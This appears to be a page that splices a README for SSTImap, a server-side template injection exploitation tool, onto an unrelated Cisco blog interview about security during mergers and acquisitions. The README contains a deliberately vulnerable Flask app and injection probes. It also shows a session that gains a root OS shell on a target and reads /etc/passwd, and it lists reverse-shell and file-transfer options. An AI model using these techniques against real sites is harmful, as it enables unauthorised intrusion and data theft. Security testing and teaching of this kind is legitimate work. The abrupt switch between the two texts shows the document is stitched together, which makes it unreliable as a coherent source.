Β
SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.
This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.
Sandbox break-out techniques came from:
This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.
Even though this software is based on Tplmap's code, backwards compatibility is not provided.
-i
) allowing for easier exploitation and detection-x
) or single command (-X
) execution{php}{/php}
. Old payload is available as Smarty_unsecure
.-A
-V
-h
for helpThis is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name
in an unsafe way, as it is concatenated to the template string before rendering.
from flask import Flask, request, render_template_string
import os
app = Flask(__name__)
@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.
$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix
User-supplied input should be introduced in a safe way through rendering context:
from flask import Flask, request, render_template_string
import os
app = Flask(__name__)
@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.
After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.
To check the URL, you can use -u
argument:
$ ./sstimap.py -u https://example.com/page?name=John
ββββββββ¦βββββββ¦ββββββββ βββ
β ββββββ£ ββββββ©βββ βββββββββ
β ββββββ£ ββββββ β β β{β _ __ ___ __ _ _ __
ββββββ β βββββ β β β β*β | '_ ` _ \ / _` | '_ \
ββββββ β βββββ β β β β}β | | | | | | (_| | |_) |
βββββββββββββββ βββ ββ¦β |_| |_| |_|\__,_| .__/
β | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
Use --os-shell
option to launch a pseudo-terminal on the target.
$ ./sstimap.py -u https://example.com/page?name=John --os-shell
ββββββββ¦βββββββ¦ββββββββ βββ
β ββββββ£ ββββββ©βββ βββββββββ
β ββββββ£ ββββββ β β β{β _ __ ___ __ _ _ __
ββββββ β βββββ β β β β*β | '_ ` _ \ / _` | '_ \
ββββββ β βββββ β β β β}β | | | | | | (_| | |_) |
ββββββββ©βββββββ βββ ββ¦β |_| |_| |_|\__,_| .__/
β | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
To get a full list of options, use --help
argument.
In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i
argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.
Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u
argument or url
command. After that, you can use run
command to check URL for SSTI.
If SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use Ctrl+C
to abort them without stopping a program.
By the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.
To get a full list of interactive commands, use command help
in interactive mode.
SSTImap supports multiple template engines and eval()-like injections.
New payloads are welcome in PRs.
Engine | RCE | Blind | Code evaluation | File read | File write |
---|---|---|---|---|---|
Mako | β | β | Python | β | β |
Jinja2 | β | β | Python | β | β |
Python (code eval) | β | β | Python | β | β |
Tornado | β | β | Python | β | β |
Nunjucks | β | β | JavaScript | β | β |
Pug | β | β | JavaScript | β | β |
doT | β | β | JavaScript | β | β |
Marko | β | β | JavaScript | β | β |
JavaScript (code eval) | β | β | JavaScript | β | β |
Dust (<= dustjs-helpers@1.5.0) | β | β | JavaScript | β | β |
EJS | β | β | JavaScript | β | β |
Ruby (code eval) | β | β | Ruby | β | β |
Slim | β | β | Ruby | β | β |
ERB | β | β | Ruby | β | β |
Smarty (unsecured) | β | β | PHP | β | β |
Smarty (secured) | β | β | PHP | β | β |
PHP (code eval) | β | β | PHP | β | β |
Twig (<=1.19) | β | β | PHP | β | β |
Freemarker | β | β | Java | β | β |
Velocity | β | β | Java | β | β |
Twig (>1.19) | Γ | Γ | Γ | Γ | Γ |
Dust (> dustjs-helpers@1.5.0) | Γ | Γ | Γ | Γ | Γ |
Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.
If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.
Scott Heider is a manager within the Cisco Security Visibility and Incident Command team that reports to the companyβs Security & Trust Organization. Primarily tasked with helping to keep the integration of an acquired companyβs solutions as efficient as possible, Heider and his team are typically brought into the process after a public announcement of the acquisition has already been made. This blog is the final in a series focused on M&A cybersecurity, following Dan Burkeβs post on Making Merger and Acquisition Cybersecurity More Manageable.
Mergers and acquisitions (M&A) are complicated. Many factors are involved, ensuring cybersecurity across the entire ecosystem as an organization integrates a newly acquired companyβs products and solutionsβand personnelβinto its workstreams.
Through decades of acquisitions, Cisco has gained expertise and experience to make its M&A efforts seamless and successful. This success is in large part to a variety of internal teams that keep cybersecurity top of mind throughout the implementation and integration process.
βPriority one for the team,β says Heider, βis to balance the enablement of business innovation with the protection of Ciscoβs information and systems. Because Cisco is now the ultimate responsible party of that acquisition, we make sure that the acquisition adheres to a minimum level of security policy standards and guidelines.β
The team looks at the acquired companyβs security posture and then partners with the company to educate and influence them to take necessary actions to achieve Ciscoβs security baseline.
That process starts with assessing the acquired companyβs infrastructure to identify and rate attack surfaces and threats. Heider asks questions that help identify issues around what he calls the four pillars of security, monitoring, and incident response:
The infrastructure that Heiderβs team evaluates isnβt just the companyβs servers and data center infrastructure. It can also include the systems the acquisition rents data center space to or public cloud infrastructure. Those considerations further complicate security and must be assessed for threats and vulnerabilities.
Once Heiderβs team is activated, they partner with the acquired company and meet with them regularly to suggest areas where that acquisition can improve its security posture and reduce the overall risk to Cisco.
Identifying and addressing risk is critical for both sides of the table, however, not just for Cisco. βA lot of acquisitions donβt realize that when Cisco acquires a company, that organization suddenly has a bigger target on its back,β says Heider. βThreat actors will often look at who Cisco is acquiring, and they might know that that companyβs security posture isnβt adequateβbecause a lot of times these acquisitions are just focused on their go-to-market strategy.β
Those security vulnerabilities can become easy entry points for threat actors to gain access to Ciscoβs systems and data. Thatβs why Heider works so closely with acquisitions to gain visibility into the companyβs environment to reduce those security threats. Some companies are more focused on security than others, and itβs up to Heiderβs team to figure out what each acquisition needs.
βThe acquisition might not have an established forensics program, for instance, and thatβs where Cisco can come in and help out,β Heider says. βThey might not have tools like Stealthwatch or NetFlow monitoring, or Firepower for IDS/IPS operations.β
When Heiderβs team can bring in their established toolset and experienced personnel, βthatβs where the relationship between my team and that acquisition grows because they see we can provide things that they just never thought about, or that they donβt have at their disposal,β he says.
One of the most important factors in a successful acquisition, according to Heider, is to develop a true partnership with the acquired company and work with the new personnel to reduce risk as efficiently as possibleβbut without major disruption.
Cisco acquires companies to expand its solution offerings to customers, so disrupting an acquisitionβs infrastructure or workflow would only slow down its integration. βWe donβt want to disrupt that acquisitionβs processes. We donβt want to disrupt their people. We donβt want to disrupt the technology,β says Heider. βWhat we want to do is be a complement to that acquisition, β that approach is an evolution, not a revolution.β
The focus on evolution can sometimes result in a long process, but along the way, the teams come to trust each other and work together. βThey know their environment better than we do. They often know what worksβso we try to learn from them. And thatβs where constant discussion, constant partnership with them helps them know that we are not a threat, weβre an ally,β says Heider. βMy team canβt be everywhere. And thatβs where we need these acquisitions to be the eyes and ears of specific areas of Ciscoβs infrastructure.β
Training is another way Heider, and his team help acquisitions get up to speed on Ciscoβs security standards. βTraining is one of the top priorities within our commitments to both Cisco and the industry,β Heider says. βThat includes training in Cisco technologies, but also making sure that these individuals are able to connect with other security professionals at conferences and other industry events.β
When asked what advice he has for enterprises that want to maintain security while acquiring other companies, Heider has a few recommendations.
Having the right security agents and clear visibility into endpoints is critical. As is inputting the data logs of those endpoints into a security event and incident management (SEIM) system. That way, explains Heider, you have visibility into your endpoints and can run plays against those logs to identify security threats. βWeβll reach out to the asset owner and say they might have malware on their systemβwhich is something nobody wants to hear,β says Heider. βBut thatβs what the job entails.β
Often, end users donβt know that theyβre clicking on something that could have malware on it. Heider says user education is almost as important as visibility into endpoints. βCisco really believes in training our users to be custodians of security, because theyβre safeguarding our assets and our customersβ data as well.β
End users should be educated about practices such as creating strong passwords and not reusing passwords across different applications. Multi-factor authentication is a good practice, and end users should become familiar with the guidelines around it.
Updating software and systems is a never-ending job, but itβs crucial for keeping infrastructure operating. Sometimes, updating a system can weaken security and create vulnerabilities. Enterprises must maintain a balance between enabling business innovation and keeping systems and data secure. Patching systems can be challenging but neglecting the task can also allow threat actors into a vulnerable system.
Heider says public cloud operations can be beneficial because youβre transferring ownership liability operations to a third party, like Amazon Web Services or Google Cloud platform. βThe only caveat,β he says, βis to make sure you understand that environment before you go and put your customerβs data on it. You might make one false click and expose your certificates to the Internet.β
Heider says that while a big part of his job is helping acquisitions uplevel their security domain to meet baseline security requirements, thereβs always the goal to do even better. βWe donβt want to be just that baseline,β he says. His team has learned from acquisitions in the past and taken some of those functionalities and technologies back to the product groups to make improvements across Ciscoβs solutions portfolio.
βWeβre customer zero β Cisco is Ciscoβs premier customer,β says Heider, βbecause we will take a product or technology into our environment, identify any gaps, and then circle back to product engineering to improve upon it for us and our customers.β
Managing Cybersecurity Risk in M&A
Demonstrating Trust and Transparency in Mergers and Acquisitions
When It Comes to M&A, Security Is a Journey
Making Merger and Acquisition Cybersecurity More Manageable
Weβd love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!
Cisco Secure Social Channels